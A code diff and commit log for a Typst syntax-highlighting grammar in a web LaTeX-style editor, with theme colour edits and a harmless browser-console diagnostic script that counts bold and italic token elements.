-
-    if (len === 0) return
-
-    const chars = []
-    for (let i = 0; i < len; i++) chars.push(input.peek(i))
-    const word = String.fromCharCode(...chars)
-
-    if (!KEYWORDS.has(word)) return
-
-    for (let i = 0; i < len; i++) input.advance()
-    input.acceptToken(CodeKeyword)
-  },
-  { contextual: true }
-)
-
-// ── codeIdentTokenizer ───────────────────────────────────────────────────
-// Emits CodeIdent — identifier tokens inside code expressions (#ident,
-// #func(args), #obj.method, etc.).
-//
-// Moving CodeIdent from @tokens to an external tokenizer allows a
-// character-level guard: we only emit when the preceding non-whitespace
-// character is one of '#', '.', '(', ',' — genuine code-context positions.
-// This stops the token from firing in markup body text where LALR-merged
-// states would otherwise cause '_italic_' to be consumed as one big
-// CodeIdent (since '_' is a valid identHead) instead of opening Emphasis.
-//
-// Keywords and bools are excluded so codeKeywordTokenizer / CodeBool can
-// handle them without conflict.
-//
-// The backward scan runs BEFORE any canShift gate.  canShift(CodeArgKey) is
-// unreliable (LALR state merging can suppress it even at genuine arg-key
-// positions, e.g. 'caption:' after a complex nested call like 'table(...)').
-// We derive couldBeArgKey from character-level evidence ('(' or ',') and use
-// that to decide whether to continue even when canShift(CodeIdent) is false.
-export const codeIdentTokenizer = new ExternalTokenizer(
-  (input, stack) => {
-    const couldBeIdent = stack.canShift(CodeIdent)
-
-    // Walk back past whitespace — primary context discriminator.
-    let back = -1
-    while (input.peek(back) === SPACE || input.peek(back) === TAB || input.peek(back) === NEWLINE) back--
-    const prev = input.peek(back)
-
-    if (prev !== HASH && prev !== DOT && prev !== OPEN_PAREN && prev !== COMMA && prev !== EQUALS && prev !== COLON && prev !== PLUS) {
-      if (!isIdentTail(prev)) {
-        // prev is a structural delimiter (e.g. ')' after a function call, '{' at
-        // block start, '}' after a nested block).  These are valid statement-start
-        // positions inside a CodeBlock's codeStatement* list.  Trust canShift —
-        // it's reliable in the grammar-parsed code-block states.
-        if (!couldBeIdent) return
-      } else {
-        // prev looks like the tail of a preceding word — scan back to find '#' or ':'.
-        // Accepting ':' lets multi-word chains like 'show sel: set text' work.
-        let b = back
-        while (isIdentTail(input.peek(b))) b--
-        while (input.peek(b) === SPACE || input.peek(b) === TAB || input.peek(b) === NEWLINE) b--
-        const chainEnd = input.peek(b)
-        if (chainEnd !== HASH && chainEnd !== COLON) {
-          // Could be second+ statement in a code block (e.g. after 'let x = 1').
-          if (!couldBeIdent) return
-        }
-      }
-    }
-
-    // In arg-delimiter positions ('(' or ',') we may emit CodeArgKey regardless
-    // of canShift(CodeIdent) — LALR merging can suppress canShift(CodeIdent)
-    // after a complex first argument (e.g. figure(table(...), caption: ...)).
-    // ':' and '=' are value positions, NOT arg-key positions.
-    const couldBeArgKey = prev === OPEN_PAREN || prev === COMMA
-    if (!couldBeIdent && !couldBeArgKey) return
-
-    // Must start with an identifier head character.
-    if (!isIdentHead(input.next)) return
-
-    // Peek ahead to read the full identifier.
-    let len = 0
-    while (true) {
-      const ch = input.peek(len)
-      if (len === 0 ? isIdentHead(ch) : isIdentTail(ch)) { len++ } else { break }
-    }
-    if (len === 0) return
-
-    const chars = []
-    for (let i = 0; i < len; i++) chars.push(input.peek(i))
-    const word = String.fromCharCode(...chars)
-
-    // Let codeKeywordTokenizer handle keywords; let CodeBool handle bools.
-    if (KEYWORDS.has(word) || BOOLS.has(word)) return
-
-    // Emit CodeArgKey when this identifier is immediately followed by ':'.
-    // Only applies in arg-delimiter positions (couldBeArgKey).
-    let isArgKey = false
-    if (couldBeArgKey) {
-      let afterLen = len
-      while (input.peek(afterLen) === SPACE || input.peek(afterLen) === TAB) afterLen++
-      isArgKey = (input.peek(afterLen) === COLON)
-    }
-
-    for (let i = 0; i < len; i++) input.advance()
-    if (isArgKey) {
-      input.acceptToken(CodeArgKey)
-    } else if (couldBeIdent) {
-      input.acceptToken(CodeIdent)
-    }
-  },
-  { contextual: true }
-)
-
-// ── strongBodyTokenizer ──────────────────────────────────────────────────
-// Emits StrongBody — the content between the '*' delimiters of a Strong node.
-//
-// contextual: true — only fires when StrongBody is in the valid set, i.e.
-// inside Strong → "*" . StrongBody? "*".  This state is very specific and
-// is not merged with item* by Lezer's aggressive LALR merging, so canShift
-// is a reliable guard here.
-//
-// Reads everything up to the first '*' or newline (Typst bold does not span
-// lines).  A trailing '*' that is the closing delimiter is left for the
-// grammar rule to consume.
-export const strongBodyTokenizer = new ExternalTokenizer(
-  (input, _stack) => {
-    let hasContent = false
-    while (input.next !== -1 && input.next !== STAR && input.next !== NEWLINE) {
-      input.advance()
-      hasContent = true
-    }
-    if (hasContent) input.acceptToken(StrongBody)
-  },
-  { contextual: true }
-)
-
-// ── emphBodyTokenizer ────────────────────────────────────────────────────
-// Emits EmphBody — the content between the '_' delimiters of an Emphasis node.
-// Same design as strongBodyTokenizer; stops at '_' or newline.
-export const emphBodyTokenizer = new ExternalTokenizer(
-  (input, _stack) => {
-    let hasContent = false
-    while (input.next !== -1 && input.next !== UNDERSCORE && input.next !== NEWLINE) {
-      input.advance()
-      hasContent = true
-    }
-    if (hasContent) input.acceptToken(EmphBody)
-  },
-  { contextual: true }
-)
@@ -5,10 +5,8 @@
 //   headingTitleTokenizer — HeadingTitle: the title text to end of line
 //   rawTokenizer          — triple-backtick raw block open/body/close
 //   rawInlineTokenizer    — single-backtick raw inline content
+//   codeBlockTokenizer    — brace-depth tracking inside #{ ... }
 //   blockCommentTokenizer — depth-tracked nested /* ... */ comments
-//   codeIdentTokenizer    — CodeIdent: identifier, only fires in code context
-//   strongBodyTokenizer   — StrongBody: content inside *...*
-//   emphBodyTokenizer     — EmphBody: content inside _..._

@top Document { item* }

@@ -26,9 +24,8 @@ item {
  Label |
  Ref |
  Escape |
-  URL |
-  MarkupContent |
-  ClosingSquare
+  Newline |
+  MarkupContent
 }

 // ── Headings ──────────────────────────────────────────────────────────────
@@ -61,140 +58,63 @@ RawInline { "`" RawInlineContent? "`" }
 //   #[ ... ]          — content block (re-parses as markup items)
 CodeExpr { "#" codeExprBody }

-// codeExprBody: forms valid after '#' in markup, or after ':' / '=' in a
-// keyword-body.  FuncExpr handles ident+callSuffix(s); bare CodeIdent handles
-// a plain variable reference (#x).  No CallExpr with callSuffix* here — that
-// *-quantifier makes both shift and reduce carry !call precedence (a tie that
-// @right cannot resolve reliably once codeStatement* state-merging is in play).
 codeExprBody {
  KeywordExpr |
  AtomExpr |
-  FuncExpr   |
-  CodeIdent  |
+  CallExpr |
  CodeBlock |
  ContentBlock
 }

-// callOrValue covers the subject of a keyword expression (#set text, #show link,
-// #import "pkg", #let name).  keywordBody is exclusive: ':' for show-rule bodies
-// and '=' for let-binding values (a keyword expression never has both).
-// Two precedences:
-//   call @right — prefer extending callSuffixes (FuncExpr) over completing the
-//           FuncExpr and letting '(' start a new statement.  The `!call` marker
-//           encodes the shift as (call << 2) and the FuncExpr reduce as
-//           (call << 2) - 1 (due to @right); shift > reduce, so callSuffix
-//           chains are greedily extended.  Without @right both actions have
-//           the same numeric precedence and the conflict is unresolved.
-//   kw   — prefer CodeKeyword !kw callOrValueAndBody over CodeKeyword keywordBody?
-//           when an identifier follows the keyword.  shift = kw << 2, reduce
-//           (second alternative) = 0; kw > 0, no @right needed.
-// add — resolves the shift/reduce conflict when a '+' follows a codeArgValue:
-//   SHIFT '+' (extend codeArgValue → codeArgValue !add "+" codeValue): prec add
-//   REDUCE codeArgItem → codeArgValue (complete arg): prec 0
-//   add > 0 → shift wins, so 0.8pt + brand stays as one arg value.
-@precedence { call @right, kw, add }
-
-// KeywordExpr: used in markup-level code (#show, #let, #set …) AND nested
-// inside codeExprBody (e.g. the RHS after ':' in a show-rule).
-// Same two-alternative structure as codeStatement: the !kw on the first
-// alternative gives the shift prec kw > 0 over the unannotated reduce of the
-// second alternative (prec 0).  This avoids the call-vs-call tie that arises
-// from the old `callOrValue?` optional pattern.
-KeywordExpr {
-  CodeKeyword !kw callOrValueAndBody |
-  CodeKeyword keywordBody?
-}
-
-// callOrValue: FuncExpr for "ident(args)" / "ident.method", bare CodeIdent for
-// a plain name, CodeString for string subjects like #import "pkg".
-// FuncExpr requires at least one callSuffix, so at [CodeIdent ·] seeing '(':
-//   SHIFT (start callSuffixes, prec call) vs REDUCE bare CodeIdent (prec 0).
-//   call > 0 → shift wins cleanly.
-callOrValue { FuncExpr | CodeIdent | CodeString }
-keywordBody { ":" codeExprBody | "=" codeValue }
+// CallExpr? covers '#set text(size: 12pt)', '#show heading: ...', etc.
+// The optional CallExpr is only shifted when the next token is CodeIdent,
+// so there is no shift/reduce conflict with other items that follow keywords.
+KeywordExpr { CodeKeyword CallExpr? }
 AtomExpr    { CodeBool    }

-// codeStatement is the unit inside a CodeBlock's brace body.
-// Two explicit alternatives for the keyword case avoid the LALR ambiguity
-// that arises from codeStatement* merging when callOrValue? is optional.
-// The !kw annotation on the first alternative (shift callOrValueAndBody) has
-// higher precedence than the bare reduce of the second alternative (prec 0),
-// so 'show strong: …' grabs 'strong' as callOrValue rather than completing
-// KeywordExpr early with empty callOrValue.
-codeStatement {
-  CodeKeyword !kw callOrValueAndBody |
-  CodeKeyword keywordBody? |
-  codeValue |
-  ";"
-}
-callOrValueAndBody { callOrValue keywordBody? }
-
-// FuncExpr: identifier followed by one-or-more call suffixes.
-// callSuffixes uses explicit left-recursion (not +) so the !call annotation
-// on the recursive extension point gives the shift prec call vs the unannotated
-// reduce of codeValue → FuncExpr (prec 0) — shift wins, no @right tie.
-callSuffixes { callSuffix | callSuffixes !call callSuffix }
-FuncExpr { CodeIdent !call callSuffixes }
+CallExpr { CodeIdent callSuffix* }
 callSuffix {
  CodeArgs |
-  "." CodeIdent |
-  ContentBlock
+  "." CodeIdent
 }

 CodeArgs    { "(" codeArgList? ")" }
 codeArgList { codeArgItem ("," codeArgItem)* ","? }
 codeArgItem {
-  CodeArgKey ":" codeArgValue |
-  codeArgValue
+  CodeIdent ":" codeValue |
+  codeValue
 }

-// codeArgValue extends codeValue with '+' chaining for expressions like
-// `stroke: 0.8pt + brand` or `fill: base + overlay`.
-// Left-recursive rule: LALR state for codeArgValue · seeing '+':
-//   SHIFT '+' (extend, !add prec): prec add > 0
-//   REDUCE codeArgItem → codeArgValue (complete): prec 0
-//   add > 0 → shift wins cleanly.  No @right needed (strict dominance).
-// Only used inside CodeArgs, so codeStatement* LALR-merging does not apply.
-codeArgValue { codeValue | codeArgValue !add "+" codeValue }
-
 codeValue {
  CodeString |
  CodeNumber |
  CodeBool   |
-  FuncExpr   |
-  CodeIdent  |
+  CallExpr   |
  ContentBlock |
  CodeBlock  |
-  InlineMath |
-  CodeArray
+  InlineMath
 }

-// Typst array / tuple / dictionary literal: (a, b) or (key: val, …)
-// Reuses codeArgList so named-key entries like (auto, 1fr) work too.
-CodeArray { "(" codeArgList? ")" }
-
-// CodeBlock parses its content as a codeStatement* list so that keywords
-// (show, let, set…) and identifiers inside braces receive proper highlighting.
-CodeBlock    { "{" codeStatement* "}" }
+// CodeBlockBody depth-tracks braces so #{ let x = { 1 } } parses correctly.
+CodeBlock    { "{" CodeBlockBody? "}" }
 // ContentBlock re-enters markup mode, allowing #[*bold* text].
 ContentBlock { "[" item* "]" }

 // ── Math ──────────────────────────────────────────────────────────────────
 // Both inline ($x^2$) and display ($ x^2 $) math use the same node type.
-// MathContent* (not ?) allows multi-line display math: each line becomes one
-// MathContent token (stopping at '\n'), and @skip consumes the newlines between.
-InlineMath { "$" MathContent* "$" }
+InlineMath { "$" MathContent? "$" }

 // ── Markup formatting ─────────────────────────────────────────────────────
-// Strong and Emphasis use flat external body tokens (StrongBody / EmphBody)
-// rather than recursive strongItem* / emphItem* loops.  The loop approach
-// triggered LALR state merging that caused item*-level tokens (MarkupContent,
-// CodeIdent) to win over StrongText/EmphText inside the construct, so the
-// body nodes were never produced.  The flat external tokens are contextual
-// (canShift only fires inside Strong/Emphasis) and reliably avoid those
-// merged states.
-Strong   { "*" StrongBody? "*" }
-Emphasis { "_" EmphBody?   "_" }
+// Cross-nesting of Strong/Emphasis is intentionally excluded to avoid a
+// mutual-recursion cycle (Strong→Emphasis→Strong) that causes state explosion
+// in the Lezer LR automaton builder.  StrongText includes '_' and EmphText
+// includes '*', so the nested delimiters are treated as plain text inside the
+// opposite construct rather than producing error nodes.
+Strong { "*" strongItem* "*" }
+strongItem { CodeExpr | InlineMath | RawInline | Label | Ref | StrongText }
+
+Emphasis { "_" emphItem* "_" }
+emphItem { CodeExpr | InlineMath | RawInline | Label | Ref | EmphText }

 // ── Labels and references ─────────────────────────────────────────────────
 Label { "<" LabelName ">" }
@@ -222,6 +142,10 @@ Escape { "\\" EscapeChar }
  RawInlineContent
 }

+@external tokens codeBlockTokenizer from "./tokens.mjs" {
+  CodeBlockBody
+}
+
@external tokens blockCommentTokenizer from "./tokens.mjs" {
  BlockCommentBody
 }
@@ -234,44 +158,30 @@ Escape { "\\" EscapeChar }
  MathContent
 }

-@external tokens codeKeywordTokenizer from "./tokens.mjs" {
-  CodeKeyword
-}
-
-// CodeIdent is external so codeIdentTokenizer can apply a character-level
-// guard: it only emits when the preceding non-whitespace character is one of
-// '#', '.', '(', ',' — i.e. genuinely inside a code expression.  This stops
-// the token from firing in markup body text, where LALR state merging would
-// otherwise cause the entire token (including any leading '_') to be consumed
-// as a code identifier instead of letting '_' open an Emphasis.
-// CodeArgKey is emitted by the same tokenizer when an identifier is immediately
-// followed by ':' — the tokenizer pre-disambiguates named arg keys so the LALR
-// parser does not need to choose between codeArgItem alternatives on lookahead.
-@external tokens codeIdentTokenizer from "./tokens.mjs" {
-  CodeIdent,
-  CodeArgKey
-}
-
-@external tokens strongBodyTokenizer from "./tokens.mjs" {
-  StrongBody
-}
-
-@external tokens emphBodyTokenizer from "./tokens.mjs" {
-  EmphBody
-}
-
 // ── Regular tokens ────────────────────────────────────────────────────────
@tokens {
-  // All whitespace including newlines.  Heading detection still works because
-  // headingTokenizer uses input.peek(-1) on the raw character stream — it sees
-  // the '\n' byte regardless of what @skip consumes at the token level.
-  // Including '\n' here lets multi-line code expressions (e.g. #figure(\n  ...\n))
-  // parse without error instead of triggering Lezer error recovery.
-  spaces { $[ \t\n\r]+ }
+  // Horizontal whitespace only.  Newlines are kept as explicit Newline items
+  // so that HeadingMark (which checks start-of-line via input.peek(-1)) can
+  // reliably detect newlines in the raw input stream.
+  spaces { $[ \t]+ }
+
+  // Keywords take precedence over identifiers when they match fully
+  // (e.g. "let" → CodeKeyword, "letter" → CodeIdent).
+  CodeKeyword {
+    "let"      | "set"      | "show"     | "import"   | "include" |
+    "if"       | "else"     | "for"      | "while"    | "return"  |
+    "break"    | "continue" | "in"       | "as"       |
+    "and"      | "or"       | "not"      | "context"
+  }

  // Boolean / null literals — distinct from keywords for highlighting.
  CodeBool { "true" | "false" | "none" | "auto" }

+  // General identifier: [A-Za-z_][A-Za-z0-9_-]*
+  CodeIdent { identHead identTail* }
+  identHead  { @asciiLetter | "_" }
+  identTail  { @asciiLetter | @digit | "_" | "-" }
+
  // Double-quoted string with backslash escapes (no single-quoted strings in Typst).
  CodeString { '"' (!["\\\n] | "\\" _)* '"' }

@@ -281,42 +191,41 @@ Escape { "\\" EscapeChar }
    ("pt" | "mm" | "cm" | "in" | "em" | "rem" | "fr" | "deg" | "rad" | "%")?
  }

-  // URL: bare https:// or http:// links in markup text.  Matched as a single
-  // token so '://' is never split into ':' + LineComment '//…'.  Stops at
-  // whitespace and angle brackets (labels use '<…>').
-  URL { ("https" | "http") "://" (![ \t\n<>])* }
+  // Text tokens for markup contexts; each excludes its own delimiters.
+  // HeadingText, LineCommentContent, and MathContent are external tokens
+  // (see above) — broad "read-to-delimiter" tokens that would otherwise
+  // conflict with every other literal token in LALR-merged states.
+  // '<' is excluded from StrongText/EmphText so that Label ('<' LabelName '>')
+  // is recognised inside strong/emphasis rather than consumed as plain text.
+  StrongText   { ![\n*$#`<@\\]+   }
+  EmphText     { ![\n_$#`<@\\]+   }

  // Regular markup: excludes all special-character starters plus whitespace
  // (whitespace is handled by @skip).  The '/' is excluded so that '//' and
-  // '/*' are not accidentally consumed as plain text.  ']' is excluded so
-  // that ContentBlock { "[" item* "]" } can always close reliably — a bare
-  // ']' in body text is matched as ClosingSquare instead.
-  MarkupContent { ![\n \t\]=*_$#/<@`\\]+ }
-
-  // Fallback for a bare ']' in markup text (outside any ContentBlock).
-  // Inside ContentBlock the literal "]" terminal wins via @precedence.
-  ClosingSquare { "]" }
+  // '/*' are not accidentally consumed as plain text.
+  MarkupContent { ![\n \t=*_$#/<@`\\]+ }

  // Label names: identifiers with optional dots/colons (e.g. <sec:intro>).
-  LabelName { (@asciiLetter | "_" | @digit) (@asciiLetter | @digit | "_" | "-" | "." | ":")* }
-  RefName   { (@asciiLetter | "_") (@asciiLetter | @digit | "_" | "-")*                      }
+  LabelName { (identHead | @digit) (identTail | "." | ":")* }
+  RefName   { identHead identTail*                           }

  // Escape: any single character after backslash.
  EscapeChar { _ }

-  // Resolve ambiguities in merged states:
-  // EscapeChar > spaces: after '\', EscapeChar must win over the skip token.
-  // "(" > "." > "]": callSuffix delimiters must win over MarkupContent after
-  //   a code identifier (merged states expose these to the markup tokenizer).
-  // "_" > MarkupContent: '_' must open Emphasis rather than being swallowed
-  //   by MarkupContent (redundant since '_' is in MarkupContent's exclusion
-  //   set, but kept for clarity).
-  // CodeIdent and StrongText/EmphText are now external tokens — not listed.
-  // "["  > MarkupContent: ContentBlock callSuffix wins in merged code/markup states.
-  // CodeString > MarkupContent: '"' starts a string literal after a keyword.
-  // ":"  > MarkupContent: keywordBody ':' wins over markup colon in code states.
-  // URL > MarkupContent: 'https://' / 'http://' wins over plain markup text.
-  @precedence { CodeBool EscapeChar CodeString URL "[" ":" "(" "." "+" "]" ClosingSquare "_" spaces MarkupContent }
+  // Newline item — kept out of @skip so heading detection works.
+  Newline { "\n" }
+
+  // Resolve ambiguities: more-specific tokens win over broader catch-alls.
+  // EscapeChar > spaces: after '\', EscapeChar must win over the skip token
+  //   (both match \t; without this, '\t' would be mis-tokenized).
+  // "(" > "." > "]" > text tokens: after '#' CodeIdent, callSuffix delimiters
+  //   must win over MarkupContent/StrongText/EmphText in merged states.
+  // LineCommentContent and MathContent are external tokens — not listed here.
+  // "_" added after CodeIdent: KeywordExpr { CodeKeyword CallExpr? } merges
+  // the post-keyword state with markup states where "_" starts Emphasis.
+  // CodeIdent wins so '#set _name(...)' is tokenised correctly; in pure markup
+  // states CodeIdent is not in the valid set so "_" still opens Emphasis.
+  @precedence { CodeKeyword CodeBool CodeIdent EscapeChar "(" "." "]" "_" spaces MarkupContent StrongText EmphText }
 }

@skip { spaces }
@@ -1,45 +0,0 @@
-// This file was generated by lezer-generator. You probably shouldn't edit it.
-export const
-  HeadingMark = 1,
-  HeadingTitle = 2,
-  RawBlockOpen = 3,
-  RawBlockBody = 4,
-  RawBlockClose = 5,
-  RawInlineContent = 6,
-  BlockCommentBody = 7,
-  LineCommentContent = 8,
-  MathContent = 9,
-  CodeKeyword = 10,
-  CodeIdent = 11,
-  CodeArgKey = 12,
-  StrongBody = 13,
-  EmphBody = 14,
-  Document = 15,
-  Heading = 16,
-  LineComment = 17,
-  BlockComment = 18,
-  RawBlock = 19,
-  RawInline = 20,
-  CodeExpr = 21,
-  KeywordExpr = 22,
-  FuncExpr = 23,
-  CodeArgs = 24,
-  CodeString = 25,
-  CodeNumber = 26,
-  CodeBool = 27,
-  ContentBlock = 28,
-  CodeBlock = 29,
-  InlineMath = 30,
-  CodeArray = 31,
-  AtomExpr = 32,
-  Strong = 33,
-  Emphasis = 34,
-  Label = 35,
-  LabelName = 36,
-  Ref = 37,
-  RefName = 38,
-  Escape = 39,
-  EscapeChar = 40,
-  URL = 41,
-  MarkupContent = 42,
-  ClosingSquare = 43
@@ -73,10 +73,7 @@
    },
    ".tok-variableName": {
      "color": "#9b859d"
-    },
-    ".tok-attributeName": {
-      "color": "#F4BF75"
    }
  },
  "dark": true
-}
+}
@@ -74,10 +74,7 @@
    },
    ".tok-variableName": {
      "color": "#FF80E1"
-    },
-    ".tok-attributeName": {
-      "color": "#FFD700"
    }
  },
  "dark": true
-}
+}
@@ -56,10 +56,7 @@
    },
    ".tok-attributeValue": {
      "color": "rgb(0, 64, 128)"
-    },
-    ".tok-attributeName": {
-      "color": "#994409"
    }
  },
  "dark": false
-}
+}
@@ -67,10 +67,7 @@
    },
    ".tok-attributeValue": {
      "color": "#234A97"
-    },
-    ".tok-attributeName": {
-      "color": "#7B3814"
    }
  },
  "dark": false
-}
+}
@@ -69,10 +69,7 @@
    },
    ".tok-list": {
      "color": "rgb(185, 6, 144)"
-    },
-    ".tok-attributeName": {
-      "color": "#994409"
    }
  },
  "dark": false
-}
+}
@@ -53,10 +53,7 @@
    ".tok-regexp": {
      "color": "#009926",
      "fontWeight": "normal"
-    },
-    ".tok-attributeName": {
-      "color": "#735C0F"
    }
  },
  "dark": false
-}
+}
@@ -71,10 +71,7 @@
    ".tok-comment": {
      "fontStyle": "italic",
      "color": "#00E060"
-    },
-    ".tok-attributeName": {
-      "color": "#F4BF75"
    }
  },
  "dark": true
-}
+}
@@ -55,10 +55,7 @@
    },
    ".tok-operator": {
      "color": "#EBDAB4"
-    },
-    ".tok-attributeName": {
-      "color": "#FABD2F"
    }
  },
  "dark": true
-}
+}
@@ -61,10 +61,7 @@
    ".tok-comment": {
      "fontStyle": "italic",
      "color": "#BC9458"
-    },
-    ".tok-attributeName": {
-      "color": "#DA4939"
    }
  },
  "dark": true
-}
+}
@@ -70,10 +70,7 @@
    },
    ".tok-variableName": {
      "color": "#FF80E1"
-    },
-    ".tok-attributeName": {
-      "color": "#d4c96e"
    }
  },
  "dark": true
-}
+}
@@ -64,10 +64,7 @@
    },
    ".tok-list": {
      "color": "#8F5B26"
-    },
-    ".tok-attributeName": {
-      "color": "#994409"
    }
  },
  "dark": false
-}
+}
@@ -57,10 +57,7 @@
    },
    ".tok-number": {
      "color": "#5A5CAD"
-    },
-    ".tok-attributeName": {
-      "color": "#7B3F00"
    }
  },
  "dark": false
-}
+}
@@ -66,10 +66,7 @@
    },
    ".tok-variableName": {
      "color": "#C1C144"
-    },
-    ".tok-attributeName": {
-      "color": "#ACA0DC"
    }
  },
  "dark": true
-}
+}
@@ -72,10 +72,7 @@
    },
    ".tok-list": {
      "color": "rgb(185, 6, 144)"
-    },
-    ".tok-attributeName": {
-      "color": "#994409"
    }
  },
  "dark": false
-}
+}
@@ -69,10 +69,7 @@
    },
    ".tok-attributeValue": {
      "color": "#7587A6"
-    },
-    ".tok-attributeName": {
-      "color": "#CF6A4C"
    }
  },
  "dark": true
-}
+}
@@ -407,19 +407,15 @@ ul.project-list-filters {
    white-space: nowrap;

    &.project-format-badge-quarto {
-      background-color: #447099; // Quarto blue (PDF output)
-    }
-
-    &.project-format-badge-quarto-slides {
-      background-color: #e4637c; // RevealJS pink-red
+      background-color: #447099;
    }

    &.project-format-badge-typst {
-      background-color: #239dad; // typst.app brand blue
+      background-color: #ee6331;
    }

    &.project-format-badge-latex {
-      background-color: #098842; // Overleaf brand green
+      background-color: #72994e;
    }
  }

@@ -53,7 +53,6 @@ export type ProjectApi = {
  accessLevel: ProjectAccessLevel
  source: Source
  compiler?: ProjectCompiler
-  quartoFlavor?: 'revealjs' | 'pdf'
 }

 export type Project = MergeAndOverride<
@@ -0,0 +1,52 @@
+// Typst bold/italic parse-tree diagnostic
+// Open a Typst document that contains  *bold*  and  _italic_  text,
+// then paste this whole block into the browser console.
+
+(function () {
+  const strong  = [...document.querySelectorAll('.tok-strong')]
+  const emphasis = [...document.querySelectorAll('.tok-emphasis')]
+
+  console.group('=== Typst bold/italic diagnostic ===')
+
+  console.log('tok-strong  count :', strong.length)
+  console.log('tok-emphasis count:', emphasis.length)
+
+  if (strong.length) {
+    console.log('tok-strong  text  :', strong.map(s => JSON.stringify(s.textContent)))
+  }
+  if (emphasis.length) {
+    console.log('tok-emphasis text :', emphasis.map(s => JSON.stringify(s.textContent)))
+  }
+
+  // Interpret results
+  if (strong.length === 0 && emphasis.length === 0) {
+    console.warn(
+      'RESULT: Grammar is NOT producing Strong/Emphasis nodes.',
+      'This is a LALR state-merge bug — needs a grammar fix.'
+    )
+  } else {
+    const strongText  = strong.map(s => s.textContent).join('')
+    const emphText    = emphasis.map(s => s.textContent).join('')
+    const hasMidStrong  = strong.length > 2   // more than just the two * delimiters
+    const hasMidEmph    = emphasis.length > 2
+
+    if (hasMidStrong || hasMidEmph) {
+      console.info(
+        'RESULT: Grammar IS producing Strong/Emphasis nodes (content inside delimiters is styled).',
+        'Bold/italic not visible? Issue is the loaded font — Source Code Pro only has Regular (400).',
+        'Fix: switch editor font to DM Mono (which has actual Italic + Medium faces).',
+        'Or: load Source Code Pro Bold/Italic font files.'
+      )
+    } else {
+      console.warn(
+        'RESULT: Partial — only the delimiters (* or _) are styled, not the text between them.',
+        'StrongText/EmphText nodes are missing. Needs a grammar fix.'
+      )
+    }
+
+    console.log('all strong text joined :', JSON.stringify(strongText))
+    console.log('all emphasis text joined:', JSON.stringify(emphText))
+  }
+
+  console.groupEnd()
+})()
Author	SHA1	Message	Date
claude	952c897760	docs: add alpha-3 security audit report Four findings: shell injection via filename (RCE on CLSI), auth bypass on publish-presentation routes, shell-escape without sandbox in prod, and stored XSS via published presentations (CSP removed on main origin). Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>	2026-06-19 10:10:19 +00:00
alois	713aa70c52	Actualiser issues3.png	2026-06-09 07:25:39 +00:00
alois	3e0188b66d	Téléverser les fichiers vers "/"	2026-06-09 07:25:13 +00:00
claude	8c9a610f0d	tools: add Typst bold/italic parse-tree diagnostic script Paste typst-bold-italic-diag.js into the browser console while a Typst document containing bold and _italic_ is open to determine whether Strong/Emphasis nodes are being produced by the grammar (grammar issue) or whether the nodes exist but bold/italic is not visually rendered (font issue — Source Code Pro only loads Regular 400). Co-Authored-By: Claude Sonnet 4.6 <noreply@anthropic.com>	2026-06-08 22:02:14 +00:00
alois	6496e9133d	Actualiser issues2.png	2026-06-08 21:22:11 +00:00
alois	5fcf4bb262	Téléverser les fichiers vers "/"	2026-06-08 21:21:48 +00:00
alois	8e6e9eded0	Actualiser issues.png	2026-06-08 20:45:03 +00:00
alois	33c830b594	Téléverser les fichiers vers "issue.png"	2026-06-08 20:44:27 +00:00
claude	f36dbd12e9	chore: rewrite diagnostic — CSS class counts + cm-content view accessor	2026-06-08 19:35:02 +00:00
claude	c65bb80512	chore: fix CodeMirror view accessor in diagnostic script	2026-06-08 19:29:49 +00:00
claude	031f65224c	chore: add browser diagnostic script for Typst highlighting	2026-06-08 19:29:49 +00:00